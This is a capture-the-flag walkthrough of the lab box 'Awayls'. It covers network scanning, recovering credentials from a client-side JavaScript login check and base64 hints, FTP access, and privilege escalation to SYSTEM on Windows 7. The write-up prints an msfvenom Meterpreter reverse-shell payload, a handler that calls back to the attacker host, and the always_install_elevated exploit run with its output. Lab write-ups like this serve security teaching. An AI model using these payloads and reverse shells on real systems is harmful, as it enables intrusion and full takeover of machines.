┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# fping -aqg 192.168.56.0/24
192.168.56.2
192.168.56.6
192.168.56.19
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# fscan -h 192.168.56.19
fscan version: 1.8.4
start infoscan
192.168.56.19:445 open
192.168.56.19:139 open
192.168.56.19:135 open
192.168.56.19:21 open
192.168.56.19:8080 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo
[*]192.168.56.19
[->]Always-PC
[->]192.168.56.19
[*] OsInfo 192.168.56.19 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle http://192.168.56.19:8080 code:200 len:178 title:We Are Sorry
Completed 5/5
[*] Scan finished, elapsed: 2.252398436s
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# curl http://192.168.56.19:8080
<DOCTYPE html>
<head>
<title>We Are Sorry</title>
</head>
<body>
<center><h1>Our Site Is Under Maintenance. Please Come Back Again Later.</h1></center>
</body>
</html>
The page only says the site is under maintenance and to come back later.
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# dirsearch -u http://192.168.56.19:8080
dirsearch v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/hmv/Awayls/reports/http_192.168.56.19_8080/_24-11-25_22-45-05.txt
Target: http://192.168.56.19:8080/
[22:45:08] 301 - 240B - /ADMIN -> http://192.168.56.19:8080/ADMIN/
[22:45:08] 301 - 240B - /Admin -> http://192.168.56.19:8080/Admin/
[22:45:08] 200 - 3KB - /admin%20/
[22:45:08] 301 - 240B - /admin -> http://192.168.56.19:8080/admin/
[22:45:08] 301 - 241B - /admin. -> http://192.168.56.19:8080/admin./
[22:45:09] 200 - 3KB - /Admin/
[22:45:09] 200 - 3KB - /admin/
[22:45:09] 200 - 3KB - /admin/index.html
[22:45:12] 403 - 199B - /cgi-bin/
[22:45:12] 500 - 530B - /cgi-bin/printenv.pl
[22:45:16] 403 - 199B - /index.php::$DATA
[22:45:24] 403 - 199B - /Trace.axd::$DATA
[22:45:26] 403 - 199B - /web.config::$DATA
Tried a few obvious weak passwords on the /admin/ login.
None worked, and the response is the same whether or not the username exists, so we can't enumerate users from it.
Let's look at SMB first; if SMB goes nowhere we'll come back to the site and try brute-forcing.
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# smbmap -u anonymous -H 192.168.56.19
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
No null session: anonymous gets no SMB session at all.
There is no domain here and port 88 (Kerberos) isn't open, so kerbrute user enumeration is out as well.
Next, check whether FTP allows anonymous login.
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# ftp 192.168.56.19
Connected to 192.168.56.19.
220 Microsoft FTP Service
Name (192.168.56.19:root): anonymous
331 Password required for anonymous.
Password:
530 User cannot log in.
ftp: Login failed
No anonymous FTP login either.
So the website is the only way in.
While setting up to capture the login request for brute-forcing, I found that clicking Login sends no request at all.
That means the check runs entirely on the front end (client-side JavaScript), so the value it compares against has to be in the page itself.
Read the page source directly.
The username and password are right there in the code:
admin:adminpass123
Logged into the admin panel.
Inside there is a hint:
ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=
Decode it:
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# echo 'ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=' |base64 -d
ftpuser:KeepGoingBro!!!
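The two manual steps above, reading the client-side check for its hard-coded credentials and decoding the base64 hint, as an added Python example; this is not code from the writeup. The HTML is constructed to mimic a login form that validates in the browser, because the page does not reproduce the real markup (the form, script and variable names are assumptions); the credentials and the base64 strings are the ones recovered on this box. The script name harvest.py in the usage note is also an assumption.

```python
import base64
import binascii
import re
import sys
from typing import List, Tuple

# Constructed HTML imitating a client-side login check. The real admin page of
# this box is not reproduced in the writeup, so the form, the script and the
# variable names are assumptions; only the credentials and the hint are the
# values recovered above.
SAMPLE_LOGIN_HTML = """
<html><body>
<form id="login"><input id="user"><input id="pass" type="password">
<button onclick="checkLogin()">Login</button></form>
<script>
function checkLogin() {
  var u = document.getElementById("user").value;
  var p = document.getElementById("pass").value;
  if (u === "admin" && p === "adminpass123") {
    window.location = "dashboard.html";
  } else {
    alert("Invalid login");
  }
}
</script>
<!-- hint: ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE= -->
</body></html>
"""

# One line of the admin notes found later on the box, copied from the writeup.
SAMPLE_NOTES = """
- 4) Don't forget to change the password for user 'always'. Current password is "WW91Q2FudEZpbmRNZS4hLiE=".
"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
# `name == "literal"` / `name === 'literal'`: the shape of a hard-coded check.
CMP_RE = re.compile(r"""\b(\w+)\s*={2,3}\s*["']([^"']+)["']""")
# Runs of base64 alphabet long enough to be worth decoding (with optional padding).
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/])")


def hardcoded_comparisons(html: str) -> List[Tuple[str, str]]:
    """Literal strings a variable is compared against inside <script> blocks."""
    found: List[Tuple[str, str]] = []
    for script in SCRIPT_RE.findall(html):
        found.extend(CMP_RE.findall(script))
    return found


def decode_base64_hints(text: str) -> List[Tuple[str, str]]:
    """Base64-looking tokens that decode to printable text, paired with the plaintext."""
    hints: List[Tuple[str, str]] = []
    for token in B64_RE.findall(text):
        try:
            plain = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, ValueError):  # bad length/alphabet or not UTF-8
            continue
        if plain.isprintable() and plain.strip():
            hints.append((token, plain))
    return hints


def fetch(url: str) -> str:
    """Pull a page over HTTP; only used when a URL is given on the command line."""
    from urllib.request import urlopen
    with urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    page = fetch(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOGIN_HTML
    for var, literal in hardcoded_comparisons(page):
        print(f"client-side comparison: {var} == {literal!r}")
    for token, plain in decode_base64_hints(page + SAMPLE_NOTES):
        print(f"base64 hint: {token} -> {plain!r}")
```

Run it as `python3 harvest.py http://192.168.56.19:8080/admin/` to inspect a live page, or with no argument to run on the constructed samples. The point is the one the writeup makes: when clicking Login sends nothing to the server, the comparison and therefore the secret live in the client, and moving the check server-side is the only real fix.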
Log in to FTP with the credentials from the hint:
ftpuser:KeepGoingBro!!!
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# ftp 192.168.56.19
Connected to 192.168.56.19.
220 Microsoft FTP Service
Name (192.168.56.19:root): ftpuser
331 Password required for ftpuser.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -a
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
10-01-24 07:17PM 56 robots.txt
226 Transfer complete.
ftp> get robots.txt
local: robots.txt remote: robots.txt
229 Entering Extended Passive Mode (|||49161|)
125 Data connection already open; Transfer starting.
100% |****************************************************| 56 314.29 KiB/s 00:00 ETA
226 Transfer complete.
56 bytes received in 00:00 (103.57 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# cat robots.txt
User-agent: *
Disallow: /admins-secret-pagexxx.html
That gives us a path: /admins-secret-pagexxx.html
Visiting it shows the admin's notes:
## Admin's Secret Notes
- 1) Disable the firewall and Windows Defender.
- 2) Enable FTP and SSH.
- 3) Start the Apache server.
- 4) Don't forget to change the password for user 'always'. Current password is "WW91Q2FudEZpbmRNZS4hLiE=".
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# echo 'WW91Q2FudEZpbmRNZS4hLiE=' |base64 -d
YouCantFindMe.!.!
From note 4 we would have:
user: always
password: YouCantFindMe.!.!
Tried logging in over WinRM with it.
It didn't work; the decoded string is not a password, it's a taunt 😅 (The open ports listed by fscan above do not include 5985/5986 either, although fscan's default scan is not a full port sweep, so a full TCP range scan would have settled whether WinRM was even reachable.)
So we need to find the real password.
After a long search I found nothing; the walkthrough shows the intended path is to log in as ftpuser directly from the VirtualBox console.
I had actually tested WinRM with this user too, but it failed. I never expected the intended route to be the VBox console. Typical CTF box; in a real engagement nobody hands you the machine to log into 😅
Once in, bring up the on-screen keyboard, otherwise the non-US keyboard layout will make you miserable 🤮
Remember to switch the layout in the top-left corner to EN.
Log in with the password KeepGoingBro!!!
Once in, all that's left is privilege escalation.
Privesc is simple. My plan was to drop a C2 implant and escalate from it; here I used a Metasploit payload.
Generate the payload with msfvenom, upload it to the box, run it, and catch the Meterpreter session.
Generate the payload:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.6 lport=7788 -f exe > msf7788.exe
开启监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.6
set lport 7788
run
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.6:7788
[*] Sending stage (176198 bytes) to 192.168.56.25
[*] Meterpreter session 1 opened (192.168.56.6:7788 -> 192.168.56.25:54117) at 2024-12-24 08:10:03 -0500
meterpreter >
Then run the local_exploit_suggester module to look for privesc candidates (the session above came from 192.168.56.25: the target's address had changed from .19 since the initial scan).
background (return to the msf prompt)
use post/multi/recon/local_exploit_suggester
set session 1
run
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] fe80::c471:5b9c:b92e:7e8a - Collecting local exploits for x86/windows...
[*] fe80::c471:5b9c:b92e:7e8a - 193 exploit checks are being tried...
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] fe80::c471:5b9c:b92e:7e8a - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/always_install_elevated Yes The target is vulnerable.
2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
5 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
7 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
8 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
Here we use the first recommended module, exploit/windows/local/always_install_elevated. Windows Installer only honours that policy when the AlwaysInstallElevated DWORD is 1 under both HKLM and HKCU (SOFTWARE\Policies\Microsoft\Windows\Installer); the module's check reads both, which is why the suggester reports "The target is vulnerable" rather than "appears to be". The MSI it uploads is run by msiexec as SYSTEM, and the new session inherits that token.
msf6 exploit(windows/local/always_install_elevated) > use exploit/windows/local/always_install_elevated
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > show options
Module options (exploit/windows/local/always_install_elevated):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.96 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/always_install_elevated) > set lhost 192.168.56.6
lhost => 192.168.56.6
msf6 exploit(windows/local/always_install_elevated) > set lport 7788
lport => 7788
msf6 exploit(windows/local/always_install_elevated) > set session 1
session => 1
msf6 exploit(windows/local/always_install_elevated) > run
[*] Started reverse TCP handler on 192.168.56.6:7788
[*] Uploading the MSI to C:\Users\ftpuser\AppData\Local\Temp\VEPgFpavVN.msi ...
[*] Executing MSI...
[*] Sending stage (176198 bytes) to 192.168.56.25
[+] Deleted C:\Users\ftpuser\AppData\Local\Temp\VEPgFpavVN.msi
[*] Meterpreter session 2 opened (192.168.56.6:7788 -> 192.168.56.25:54480) at 2024-12-24 08:16:38 -0500
meterpreter > shell
Process 1976 created.
Channel 2 created.
Microsoft Windows [Sürüm 6.1.7601]
Telif Hakkı (c) 2009 Microsoft Corporation. Tüm hakları saklıdır.
C:\Windows\system32>whoami
whoami
nt authority\system
Finally, the flags:
HMV{You_Found_Me!}
HMV{White_Flag_Raised}